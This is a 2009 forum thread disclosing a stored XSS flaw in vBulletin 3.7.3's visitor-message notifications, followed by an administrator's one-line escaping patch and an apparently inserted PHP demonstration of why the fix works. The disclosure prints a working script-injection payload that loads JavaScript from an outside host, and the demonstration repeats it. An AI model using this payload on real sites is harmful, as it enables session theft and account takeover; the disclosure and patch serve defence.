vBulletin 3.7.3 PL1 XSS Vulnerability and Patch Fix

Discussion in 'Ethical hacking Tips' started by SaswatPadhi, Jun 8, 2009.

  1. SaswatPadhi

    SaswatPadhi ~ Б0ЯИ Τ0 С0δЭ ~

    Joined:
    May 5, 2009
    Messages:
    1,342
    Likes Received:
    55
    Trophy Points:
    0
    Occupation:
    STUDENT !
    Location:
    Orissa, INDIA
    Home Page:
    http://www.crackingforfun.blogspot.com

    NOTICE



    THIS XSS/XSRF VULNERABILITY WAS FOUND BY ME.

    @ admin (shabbir)

Please don't ban me for this, because I have not used this hack for any illegal / harmful purposes (you can check all records). I have just tested an exploit and found it positive. Please fix it soon. I wrote this article so as to bring this thing to your eyes first, before anyone else knows about it and takes advantage.

    Please do NOT reject this article and please approve it. Please don't remove this NOTICE section.


    Action ;)



    First, we must check the version of vBulletin used by G4EF :
    (1) Open any page such as your user control panel.
    (2) View the page-source.
    (3) You discover this :
    Code:
    <style type="text/css" id="vbulletin_css">
    /**
    * vBulletin 3.7.3 CSS
    * Style: 'Default Style'; Style ID: 1
    */
    @import url("clientscript/vbulletin_css/style-eb31dabe-00001.css");
    </style>
    (4) Perfect! G4EF is not upgraded to the latest 3.8.x vBulletin. So, we can hack it. :)

    The vulnerability :
    When vBulletin is used with the "Visitor Messages" add-on, we can easily execute external code through an XSS vulnerability that exists there. When the XSS script is posted as a visitor message, the data is run through htmlentities() before being displayed to the general public/forum members. However, when a new message is posted, a notification is sent to the commentee (the one who receives it). And when the commentee visits usercp.php (User Control Panel), he is hit with an unfiltered XSS attack under the forum's domain!

    How I tested it :
    (1) I opened a duplicate account, _H4X0R_, which I request shabbir to kindly delete now.
    (2) I posted some test visitor messages. The most interesting (and working) one was <SCRIPT SRC=http://ha.ckers.org/xss.js>
    (3) I logged out.
    (4) I logged in as _H4X0R_.
    (5) Opened my user control panel: usercp.php.
    (6) Whoa!! XSS successful!


    Conclusion



    Please don't use this knowledge for illegal/harmful purposes. This was written only for educational purposes.

    I think I deserve some good reputation points and/or some rewards for this!

    Sorry shabbir, for using a duplicate account, but you may delete it now. You should also understand that this was important for the security of the forum, so please don't ban me :p
     
  2. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,375
    Likes Received:
    388
    Trophy Points:
    83
    Thanks for reporting, Saswat. Upgrading to 3.7.6 is the preferred solution, which we will also be doing, but here is the quick fix. Using vBulletin 3.7.3 and having all the functionality and plugins tested, I preferred not to upgrade immediately (though I have the upgrade option), and here is the patch for this vulnerability.

    Open usercp.php file
    Go to Line Number 250
    Find the following Code
    Code:
    $visitormessage['summary'] = fetch_word_wrapped_string(fetch_censored_text(fetch_trimmed_title(strip_bbcode($visitormessage['pagetext'], true, true), 50)));
    
    Replace with
    Code:
    $visitormessage['summary'] = htmlspecialchars_uni(fetch_word_wrapped_string(fetch_censored_text(fetch_trimmed_title(strip_bbcode($visitormessage['pagetext'], true, true), 50))));
    
    And that should be fine for this problem.

    vBulletin also recommends upgrading to the latest version, which has all the fixes.
     
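    To show why the one-line patch above works, and why the summary line was exploitable in the first place, here is a stand-in for the usercp.php summary pipeline. This is an added example, not vBulletin's code: strip_bbcode, fetch_trimmed_title, fetch_censored_text and fetch_word_wrapped_string are real vBulletin helpers, but the two helpers below are simplified stand-ins of my own (they only strip BBCode tags and truncate), and PHP's htmlspecialchars() with ENT_QUOTES stands in for htmlspecialchars_uni(). The payload from the first post is included among the constructed inputs.

```php
<?php
// Added example: a simplified model of the visitor-message summary that
// usercp.php builds for the notification list. Helper names prefixed
// "stand_in_" are hypothetical replacements for vBulletin's own functions.

function stand_in_strip_bbcode(string $text): string
{
    // Remove [tag], [/tag] and [tag=value] markup only. Like vBulletin's
    // strip_bbcode(), this is about BBCode and leaves raw HTML untouched,
    // which is exactly why the result must still be escaped before output.
    return preg_replace('/\[\/?[a-z]+(?:=[^\]]*)?\]/i', '', $text);
}

function stand_in_trim_title(string $text, int $len): string
{
    // Byte-based truncation is enough for this demonstration.
    return strlen($text) > $len ? substr($text, 0, $len - 3) . '...' : $text;
}

// Vulnerable (pre-patch): the summary goes into the template as-is.
function summary_vulnerable(string $pagetext): string
{
    return stand_in_trim_title(stand_in_strip_bbcode($pagetext), 50);
}

// Patched: escape once, as the outermost call, after every transformation.
// Escaping last means truncation can never cut an entity like &lt; in half
// and leave a stray "<" behind.
function summary_patched(string $pagetext): string
{
    return htmlspecialchars(summary_vulnerable($pagetext), ENT_QUOTES, 'UTF-8');
}

// Constructed sample messages (not real forum data).
$payloads = [
    '<SCRIPT SRC=http://ha.ckers.org/xss.js>',
    '[b]hello[/b] <img src=x onerror=alert(1)>',
    'plain text with "quotes" & an ampersand that is longer than fifty chars',
];

foreach ($payloads as $p) {
    echo "input:      $p\n";
    echo "vulnerable: " . summary_vulnerable($p) . "\n";
    echo "patched:    " . summary_patched($p) . "\n\n";
}
```

    Run with `php example.php`. The vulnerable line echoes the <SCRIPT> tag intact, so a browser rendering the user control panel would fetch and execute the remote script in the forum's origin; the patched line produces &lt;SCRIPT SRC=...&gt;, which the browser shows as text. The order matters: BBCode stripping, censoring, trimming and wrapping all operate on the raw text, and the HTML escape is applied once at the very end, which is the same shape as shabbir's patch.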
  3. SaswatPadhi

    Glad to know that it's fixed. :)
     
  4. indiansword

    indiansword Security Expert

    Joined:
    Oct 19, 2008
    Messages:
    491
    Likes Received:
    37
    Trophy Points:
    0
    Occupation:
    Operation Planner for 3 Australia
    Home Page:
    http://www.Secworm.net
    Nice find. I really like XSS vulnerabilities. Not 100% sure, but I think it was already reported to miliw0rm a couple of months back.
     
    Last edited: Jun 10, 2009
  5. SaswatPadhi

    What's miliw0rm?
     
  6. indiansword

    Check out miliw0rm.com; all the vulnerabilities found by different hackers and penetration testers are released under that program. Just search for "vbulletin" and you will see lots of them. This site plays a major role in helping the developers of different CMSes release new versions of their software after fixing the vulnerabilities.
     
  7. SaswatPadhi

    Yeah, I got it. But it's not miliw0rm.com, it's milw0rm.com.
    Lots of vulnerabilities and an MD5 cracker too: the perfect package for hackers.
     
  8. indiansword

    Yeah, sorry for that spelling mistake.
     
  9. shabbir

    Yes, it was found on many other websites as well, but no one had the patch unless you upgraded the complete code, and so here I provided the patch as well. Enjoy
     
  10. harshit

    harshit New Member

    Joined:
    May 30, 2009
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    0
    great piece of information
     
  11. mayjune

    mayjune New Member

    Joined:
    Jun 14, 2009
    Messages:
    814
    Likes Received:
    33
    Trophy Points:
    0
    Occupation:
    Student
    Location:
    Pune,Delhi
    Can you explain what XSS is? I searched, but I am still not getting it...
     